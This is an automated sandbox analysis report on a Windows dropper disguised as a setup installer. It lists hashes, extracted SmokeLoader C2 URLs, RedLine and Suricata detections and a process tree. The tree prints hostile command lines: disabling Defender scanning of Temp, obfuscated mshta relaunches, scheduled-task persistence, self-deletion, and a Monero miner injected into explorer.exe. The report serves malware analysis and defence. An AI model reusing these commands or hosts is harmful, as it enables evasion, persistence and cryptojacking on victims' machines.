Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
13-10-2021 18:35
211013-w8lxmaegdr 1013-10-2021 12:38
211013-pvkdbadhdm 1013-10-2021 05:30
211013-f7nrtsdfa3 1012-10-2021 20:25
211012-y7qwasdbh4 1011-10-2021 21:02
211011-zvywtaabdq 10Analysis
-
max time kernel
14s -
max time network
658s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
13-10-2021 18:35
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20210920
General
-
Target
setup_x86_x64_install.exe
-
Size
3.4MB
-
MD5
26f28bf2dc2b6afc0dd99cb6ea3879b8
-
SHA1
9270b9f48e2d14cc2cbed61ee2e2389d5f69ce05
-
SHA256
5f30eae71c1b0d08e7ec5adfc9a0dc98078595502b60a584a8df5cdf8cacf7fa
-
SHA512
5a350373e87673c9ba39e5353bea1d7c1f2f7bc62a703ed13e892e69037008f3e2accadbdd0ec0bd976e54c68b79dfad6fb37517dd55448cac4d9d74ae8a037b
Malware Config
Extracted
smokeloader
2020
http://gmpeople.com/upload/
http://mile48.com/upload/
http://lecanardstsornin.com/upload/
http://m3600.com/upload/
http://camasirx.com/upload/
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
resource yara_rule behavioral2/memory/2400-253-0x000000000041B236-mapping.dmp family_redline behavioral2/memory/2388-254-0x000000000041B23A-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32/Kryptik.HMCH Dropper User-Agent M1
suricata: ET MALWARE Win32/Kryptik.HMCH Dropper User-Agent M1
-
suricata: ET MALWARE Win32/Kryptik.HMCH Dropper User-Agent M2
suricata: ET MALWARE Win32/Kryptik.HMCH Dropper User-Agent M2
-
suricata: ET MALWARE Win32/Kryptik.HMCH Dropper User-Agent M3
suricata: ET MALWARE Win32/Kryptik.HMCH Dropper User-Agent M3
-
suricata: ET MALWARE Win32/Kryptik.HMCH Dropper User-Agent M4
suricata: ET MALWARE Win32/Kryptik.HMCH Dropper User-Agent M4
-
resource yara_rule behavioral2/files/0x00030000000130db-75.dat aspack_v212_v242 behavioral2/files/0x00030000000130db-76.dat aspack_v212_v242 behavioral2/files/0x00030000000130da-77.dat aspack_v212_v242 behavioral2/files/0x00030000000130da-78.dat aspack_v212_v242 behavioral2/files/0x00030000000130dd-81.dat aspack_v212_v242 behavioral2/files/0x00030000000130dd-82.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 12 IoCs
pid Process 1300 setup_installer.exe 1108 setup_install.exe 1620 Mon20762bc3f6.exe 912 Mon204014f13870f5e.exe 2036 Mon20927aab1e5.exe 1792 WerFault.exe 336 Mon206d48916f93c5.exe 1560 Mon209b3da1556b9a317.exe 1900 Mon203f01ac7e6.exe 1188 Mon20d3b8b752.exe 1328 Mon209c830507d573.exe 1592 Mon20b6f9d5bd03a305.exe -
Loads dropped DLL 43 IoCs
pid Process 1952 setup_x86_x64_install.exe 1300 setup_installer.exe 1300 setup_installer.exe 1300 setup_installer.exe 1300 setup_installer.exe 1300 setup_installer.exe 1300 setup_installer.exe 1108 setup_install.exe 1108 setup_install.exe 1108 setup_install.exe 1108 setup_install.exe 1108 setup_install.exe 1108 setup_install.exe 1108 setup_install.exe 1108 setup_install.exe 592 cmd.exe 1620 Mon20762bc3f6.exe 1620 Mon20762bc3f6.exe 1004 cmd.exe 1004 cmd.exe 1804 cmd.exe 1804 cmd.exe 1156 cmd.exe 1156 cmd.exe 912 Mon204014f13870f5e.exe 912 Mon204014f13870f5e.exe 2036 Mon20927aab1e5.exe 2036 Mon20927aab1e5.exe 1908 cmd.exe 1792 WerFault.exe 1792 WerFault.exe 1360 services64.exe 560 DownFlSetup110.exe 1864 AB2D.exe 2016 cmd.exe 2016 cmd.exe 1900 Mon203f01ac7e6.exe 1900 Mon203f01ac7e6.exe 1188 Mon20d3b8b752.exe 1188 Mon20d3b8b752.exe 1328 Mon209c830507d573.exe 1328 Mon209c830507d573.exe 1644 cmd.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 15 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
pid pid_target Process procid_target 1792 2084 WerFault.exe 61 3028 1588 WerFault.exe 133 -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2204 schtasks.exe 2712 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 960 timeout.exe -
Kills process with taskkill 2 IoCs
pid Process 2316 taskkill.exe 2824 taskkill.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1560 Mon209b3da1556b9a317.exe Token: SeDebugPrivilege 336 Mon206d48916f93c5.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1952 wrote to memory of 1300 1952 setup_x86_x64_install.exe 27 PID 1952 wrote to memory of 1300 1952 setup_x86_x64_install.exe 27 PID 1952 wrote to memory of 1300 1952 setup_x86_x64_install.exe 27 PID 1952 wrote to memory of 1300 1952 setup_x86_x64_install.exe 27 PID 1952 wrote to memory of 1300 1952 setup_x86_x64_install.exe 27 PID 1952 wrote to memory of 1300 1952 setup_x86_x64_install.exe 27 PID 1952 wrote to memory of 1300 1952 setup_x86_x64_install.exe 27 PID 1300 wrote to memory of 1108 1300 setup_installer.exe 28 PID 1300 wrote to memory of 1108 1300 setup_installer.exe 28 PID 1300 wrote to memory of 1108 1300 setup_installer.exe 28 PID 1300 wrote to memory of 1108 1300 setup_installer.exe 28 PID 1300 wrote to memory of 1108 1300 setup_installer.exe 28 PID 1300 wrote to memory of 1108 1300 setup_installer.exe 28 PID 1300 wrote to memory of 1108 1300 setup_installer.exe 28 PID 1108 wrote to memory of 1736 1108 setup_install.exe 30 PID 1108 wrote to memory of 1736 1108 setup_install.exe 30 PID 1108 wrote to memory of 1736 1108 setup_install.exe 30 PID 1108 wrote to memory of 1736 1108 setup_install.exe 30 PID 1108 wrote to memory of 1736 1108 setup_install.exe 30 PID 1108 wrote to memory of 1736 1108 setup_install.exe 30 PID 1108 wrote to memory of 1736 1108 setup_install.exe 30 PID 1108 wrote to memory of 592 1108 setup_install.exe 31 PID 1108 wrote to memory of 592 1108 setup_install.exe 31 PID 1108 wrote to memory of 592 1108 setup_install.exe 31 PID 1108 wrote to memory of 592 1108 setup_install.exe 31 PID 1108 wrote to memory of 592 1108 setup_install.exe 31 PID 1108 wrote to memory of 592 1108 setup_install.exe 31 PID 1108 wrote to memory of 592 1108 setup_install.exe 31 PID 1108 wrote to memory of 1156 1108 setup_install.exe 32 PID 1108 wrote to memory of 1156 1108 setup_install.exe 32 PID 1108 wrote to memory of 1156 1108 setup_install.exe 32 PID 1108 wrote to memory of 1156 1108 setup_install.exe 32 PID 1108 wrote to memory of 1156 1108 setup_install.exe 32 PID 1108 wrote to memory of 1156 1108 setup_install.exe 32 PID 1108 wrote to memory of 1156 1108 setup_install.exe 32 PID 1108 wrote to memory of 1004 1108 setup_install.exe 33 PID 1108 wrote to memory of 1004 1108 setup_install.exe 33 PID 1108 wrote to memory of 1004 1108 setup_install.exe 33 PID 1108 wrote to memory of 1004 1108 setup_install.exe 33 PID 1108 wrote to memory of 1004 1108 setup_install.exe 33 PID 1108 wrote to memory of 1004 1108 setup_install.exe 33 PID 1108 wrote to memory of 1004 1108 setup_install.exe 33 PID 1108 wrote to memory of 1804 1108 setup_install.exe 34 PID 1108 wrote to memory of 1804 1108 setup_install.exe 34 PID 1108 wrote to memory of 1804 1108 setup_install.exe 34 PID 1108 wrote to memory of 1804 1108 setup_install.exe 34 PID 1108 wrote to memory of 1804 1108 setup_install.exe 34 PID 1108 wrote to memory of 1804 1108 setup_install.exe 34 PID 1108 wrote to memory of 1804 1108 setup_install.exe 34 PID 1736 wrote to memory of 1716 1736 cmd.exe 35 PID 1736 wrote to memory of 1716 1736 cmd.exe 35 PID 1736 wrote to memory of 1716 1736 cmd.exe 35 PID 1736 wrote to memory of 1716 1736 cmd.exe 35 PID 1736 wrote to memory of 1716 1736 cmd.exe 35 PID 1736 wrote to memory of 1716 1736 cmd.exe 35 PID 1736 wrote to memory of 1716 1736 cmd.exe 35 PID 1108 wrote to memory of 1360 1108 setup_install.exe 36 PID 1108 wrote to memory of 1360 1108 setup_install.exe 36 PID 1108 wrote to memory of 1360 1108 setup_install.exe 36 PID 1108 wrote to memory of 1360 1108 setup_install.exe 36 PID 1108 wrote to memory of 1360 1108 setup_install.exe 36 PID 1108 wrote to memory of 1360 1108 setup_install.exe 36 PID 1108 wrote to memory of 1360 1108 setup_install.exe 36 PID 1108 wrote to memory of 1908 1108 setup_install.exe 37
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1952 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1300 -
C:\Users\Admin\AppData\Local\Temp\7zS41572155\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS41572155\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1108 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵PID:1716
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon20762bc3f6.exe4⤵
- Loads dropped DLL
PID:592 -
C:\Users\Admin\AppData\Local\Temp\7zS41572155\Mon20762bc3f6.exeMon20762bc3f6.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1620
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon206b909958ed4.exe /mixone4⤵
- Loads dropped DLL
PID:1156 -
C:\Users\Admin\AppData\Local\Temp\7zS41572155\Mon206b909958ed4.exeMon206b909958ed4.exe /mixone5⤵PID:1792
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{OxjG-1vQ3t-P5Er-FXTh3}\26222580897.exe"6⤵PID:2984
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{OxjG-1vQ3t-P5Er-FXTh3}\22993480090.exe" /mix6⤵PID:2136
-
C:\Users\Admin\AppData\Local\Temp\{OxjG-1vQ3t-P5Er-FXTh3}\22993480090.exe"C:\Users\Admin\AppData\Local\Temp\{OxjG-1vQ3t-P5Er-FXTh3}\22993480090.exe" /mix7⤵PID:1508
-
C:\Users\Admin\AppData\Roaming\wowsfree\mopnns.exemopnns.exe8⤵PID:1964
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{OxjG-1vQ3t-P5Er-FXTh3}\85185613446.exe" /mix6⤵PID:2272
-
C:\Users\Admin\AppData\Local\Temp\{OxjG-1vQ3t-P5Er-FXTh3}\85185613446.exe"C:\Users\Admin\AppData\Local\Temp\{OxjG-1vQ3t-P5Er-FXTh3}\85185613446.exe" /mix7⤵PID:1984
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\UENpgmsUO & timeout 4 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{OxjG-1vQ3t-P5Er-FXTh3}\85185613446.exe"8⤵PID:2724
-
C:\Windows\SysWOW64\timeout.exetimeout 49⤵
- Delays execution with timeout.exe
PID:960
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"6⤵PID:2512
-
C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"7⤵PID:2252
-
C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"8⤵PID:1772
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Mon206b909958ed4.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS41572155\Mon206b909958ed4.exe" & exit6⤵PID:2292
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon20927aab1e5.exe4⤵
- Loads dropped DLL
PID:1004 -
C:\Users\Admin\AppData\Local\Temp\7zS41572155\Mon20927aab1e5.exeMon20927aab1e5.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2036 -
C:\Users\Admin\AppData\Local\Temp\7zS41572155\Mon20927aab1e5.exeC:\Users\Admin\AppData\Local\Temp\7zS41572155\Mon20927aab1e5.exe6⤵PID:2388
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon204014f13870f5e.exe4⤵
- Loads dropped DLL
PID:1804 -
C:\Users\Admin\AppData\Local\Temp\7zS41572155\Mon204014f13870f5e.exeMon204014f13870f5e.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:912
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon203f01ac7e6.exe4⤵PID:1360
-
C:\Users\Admin\AppData\Local\Temp\7zS41572155\Mon203f01ac7e6.exeMon203f01ac7e6.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1900 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS41572155\Mon203f01ac7e6.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS41572155\Mon203f01ac7e6.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )6⤵PID:1616
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS41572155\Mon203f01ac7e6.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS41572155\Mon203f01ac7e6.exe") do taskkill /F -Im "%~NxU"7⤵PID:2264
-
C:\Users\Admin\AppData\Local\Temp\09xU.exE09xU.EXE -pPtzyIkqLZoCarb5ew8⤵PID:2304
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )9⤵PID:1608
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"10⤵PID:2860
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F -Im "Mon203f01ac7e6.exe"8⤵
- Kills process with taskkill
PID:2316
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon206d48916f93c5.exe4⤵
- Loads dropped DLL
PID:1908 -
C:\Users\Admin\AppData\Local\Temp\7zS41572155\Mon206d48916f93c5.exeMon206d48916f93c5.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:336 -
C:\Users\Admin\AppData\Roaming\6209349.scr"C:\Users\Admin\AppData\Roaming\6209349.scr" /S6⤵PID:1952
-
-
C:\Users\Admin\AppData\Roaming\2969088.scr"C:\Users\Admin\AppData\Roaming\2969088.scr" /S6⤵PID:2104
-
-
C:\Users\Admin\AppData\Roaming\7766885.scr"C:\Users\Admin\AppData\Roaming\7766885.scr" /S6⤵PID:2212
-
-
C:\Users\Admin\AppData\Roaming\5597804.scr"C:\Users\Admin\AppData\Roaming\5597804.scr" /S6⤵PID:2284
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon209c830507d573.exe4⤵
- Loads dropped DLL
PID:2016 -
C:\Users\Admin\AppData\Local\Temp\7zS41572155\Mon209c830507d573.exeMon209c830507d573.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1328 -
C:\Users\Admin\AppData\Local\Temp\7zS41572155\Mon209c830507d573.exeC:\Users\Admin\AppData\Local\Temp\7zS41572155\Mon209c830507d573.exe6⤵PID:2400
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon2083f8d8970a0b2d.exe4⤵PID:1672
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon209b3da1556b9a317.exe4⤵PID:560
-
C:\Users\Admin\AppData\Local\Temp\7zS41572155\Mon209b3da1556b9a317.exeMon209b3da1556b9a317.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1560 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵PID:1512
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵PID:1824
-
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"7⤵
- Loads dropped DLL
PID:560 -
C:\Users\Admin\AppData\Roaming\3330029.scr"C:\Users\Admin\AppData\Roaming\3330029.scr" /S8⤵PID:2960
-
-
C:\Users\Admin\AppData\Roaming\1974939.scr"C:\Users\Admin\AppData\Roaming\1974939.scr" /S8⤵PID:2100
-
-
C:\Users\Admin\AppData\Roaming\6395215.scr"C:\Users\Admin\AppData\Roaming\6395215.scr" /S8⤵PID:2264
-
-
C:\Users\Admin\AppData\Roaming\6655431.scr"C:\Users\Admin\AppData\Roaming\6655431.scr" /S8⤵PID:2256
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"9⤵PID:532
-
-
-
C:\Users\Admin\AppData\Roaming\2981686.scr"C:\Users\Admin\AppData\Roaming\2981686.scr" /S8⤵PID:2840
-
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe"C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe"7⤵PID:2084
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 9608⤵
- Executes dropped EXE
- Loads dropped DLL
- Program crash
PID:1792
-
-
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"7⤵PID:2124
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵PID:2204
-
C:\Users\Admin\AppData\Local\Temp\is-KVLAT.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-KVLAT.tmp\setup.tmp" /SL5="$7019A,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"8⤵PID:2660
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT9⤵PID:2756
-
C:\Users\Admin\AppData\Local\Temp\is-KJURF.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-KJURF.tmp\setup.tmp" /SL5="$8019A,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT10⤵PID:2792
-
C:\Users\Admin\AppData\Local\Temp\is-804GI.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-804GI.tmp\postback.exe" ss111⤵PID:3068
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵PID:2588
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:1752
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:2204
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
- Loads dropped DLL
PID:1360 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:816
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:2712
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵PID:1512
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵PID:1156
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon20b6f9d5bd03a305.exe4⤵
- Loads dropped DLL
PID:1644 -
C:\Users\Admin\AppData\Local\Temp\7zS41572155\Mon20b6f9d5bd03a305.exeMon20b6f9d5bd03a305.exe5⤵
- Executes dropped EXE
PID:1592
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon20d3b8b752.exe4⤵PID:1864
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS41572155\Mon20d3b8b752.exeMon20d3b8b752.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1188
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Mon206b909958ed4.exe" /f1⤵
- Kills process with taskkill
PID:2824
-
C:\Users\Admin\AppData\Local\Temp\AB2D.exeC:\Users\Admin\AppData\Local\Temp\AB2D.exe1⤵
- Loads dropped DLL
PID:1864
-
C:\Windows\system32\taskeng.exetaskeng.exe {C9307F49-0BF7-44A3-B61B-6779517EA8C1} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]1⤵PID:2344
-
C:\Users\Admin\AppData\Roaming\ggfjriiC:\Users\Admin\AppData\Roaming\ggfjrii2⤵PID:928
-
-
C:\Users\Admin\AppData\Local\Temp\5C44.exeC:\Users\Admin\AppData\Local\Temp\5C44.exe1⤵PID:1588
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1588 -s 4522⤵
- Program crash
PID:3028
-